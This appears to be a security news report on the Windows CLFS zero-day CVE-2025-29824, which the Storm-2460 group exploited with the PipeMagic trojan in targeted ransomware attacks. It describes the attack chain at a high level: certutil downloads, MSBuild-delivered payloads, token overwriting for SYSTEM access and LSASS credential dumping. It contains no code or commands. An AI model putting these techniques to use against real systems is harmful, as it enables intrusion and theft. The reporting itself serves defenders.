A recently discovered zero-day vulnerability in the Windows Common Log File System (CLFS) has been actively exploited in ransomware attacks using the PipeMagic Trojan, Microsoft has confirmed. This critical flaw, now patched, allowed threat actors to gain SYSTEM-level access and launch targeted cyberattacks across several global sectors.
High-Profile Targets Across Multiple Countries
The attackers set their sights on a narrow group of victims. According to Microsoft, targeted organizations included IT and real estate firms in the U.S., a financial institution in Venezuela, a Spanish software company, and a major retail business in Saudi Arabia. These attacks mark another wave of highly selective ransomware operations driven by privilege escalation tactics.
CVE-2025-29824: The Core of the Exploit
Tracked as CVE-2025-29824, the exploited bug is a privilege escalation flaw embedded in the CLFS kernel driver. It allowed attackers to obtain SYSTEM privileges—a crucial step in launching devastating ransomware campaigns. The vulnerability was patched in Microsoft’s April 2025 Patch Tuesday update. However, before the fix, the bug was exploited in the wild as part of an advanced attack chain.
Microsoft has attributed this threat activity to a group it tracks as Storm-2460. The attackers leveraged PipeMagic, a trojan that serves as both a delivery mechanism for the exploit and the ransomware payload.
Malware Delivery via Compromised Tools
While the precise method of initial access remains unclear, researchers noted that the attackers used the certutil command-line tool to download malware from a legitimate but compromised third-party website. The malware was delivered as an MSBuild project file with an encrypted payload that, once executed, launched the PipeMagic Trojan.
This sophisticated malware is plugin-based and modular, and has been in circulation since at least 2022. It is capable of deploying various post-exploitation tools, including credential stealers and ransomware.
Repeated Use of PipeMagic in Zero-Day Attacks
This isn’t the first time PipeMagic has been tied to zero-day exploits. The same Trojan was previously used to deploy ransomware using CVE-2025-24983, a vulnerability in the Windows Win32 Kernel Subsystem, flagged by ESET and patched just last month. It also played a role in earlier attacks involving Nokoyawa ransomware, which exploited the 2023 zero-day flaw CVE-2023-28252—also within CLFS.
Security firm Kaspersky had previously noted that PipeMagic often arrives via MSBuild scripts and serves as a custom backdoor. This modular design gives attackers the flexibility to load additional malicious components on compromised systems.
Protection in Windows 11 Version 24H2
Fortunately, the most recent version of Windows 11 (24H2) is not affected by this specific exploit. That’s because it restricts access to sensitive System Information Classes within NtQuerySystemInformation to users with SeDebugPrivilege—a privilege typically reserved for administrators.
Microsoft’s Threat Intelligence team detailed how the exploit manipulates memory using the RtlSetAllBits API to overwrite the process token with 0xFFFFFFFF, effectively granting all privileges. This enables attackers to inject malicious code into SYSTEM-level processes.
After Gaining Access: Credential Theft and File Encryption
Once attackers elevate their privileges, they move quickly to extract user credentials by dumping the memory of LSASS (Local Security Authority Subsystem Service). From there, the ransomware component encrypts files using randomly generated extensions, making detection and recovery more difficult.
Although Microsoft has not yet obtained a sample of the ransomware used, the ransom note left behind included a TOR address associated with the RansomEXX ransomware family—known for targeting enterprise networks with high-impact encryption attacks.
Post-Compromise Privilege Escalation: A Critical Threat Vector
Microsoft emphasized that exploits like CVE-2025-29824 are highly valuable to ransomware operators. By gaining privileged access after an initial compromise—often through commodity malware—they can execute lateral movement and mass ransomware deployment across an entire network.
